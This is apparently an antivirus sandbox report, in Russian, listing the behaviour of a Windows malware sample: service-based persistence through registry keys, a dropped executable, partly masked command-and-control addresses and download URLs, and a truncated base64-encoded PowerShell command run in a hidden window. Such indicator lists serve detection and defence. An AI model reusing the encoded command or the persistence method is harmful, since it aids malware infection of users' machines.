Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\withoutchore] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\withoutchore] 'ImagePath' = '"<SYSTEM32>\withoutchore.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGIAMAAyADYAMwB4ADEAMQBiADMAYwA9ACcAYgAwAGMAMQAwADUAMQA1ADYAMgA4ACcAOwAkAHgANwA5AHgAOQAyADUAMAA...
- %HOMEPATH%\277.exe
- %HOMEPATH%\277.exe в <SYSTEM32>\withoutchore.exe
- '69.##2.169.173':8080
- '68.##3.190.199':8080
- http://su####ietjen.com/wp-admin/u442/
- http://www.va#####-extensions.com/wp-content/0hb3292/
- http://ar#######tems.bubaglobal.com/crm/f8i6/
- http://68.###.190.199:8080/psec/
- DNS ASK su####ietjen.com
- DNS ASK va#####-extensions.com
- DNS ASK sa####nandmart.com
- DNS ASK ar#######tems.bubaglobal.com
- '%HOMEPATH%\277.exe'
- '<SYSTEM32>\withoutchore.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGIAMAAyADYAMwB4ADEAMQBiADMAYwA9ACcAYgAwAGMAMQAwADUAMQA1ADYAMgA4ACcAOwAkAHgANwA5AHgAOQAyADUAMAA...' (со скрытым окном)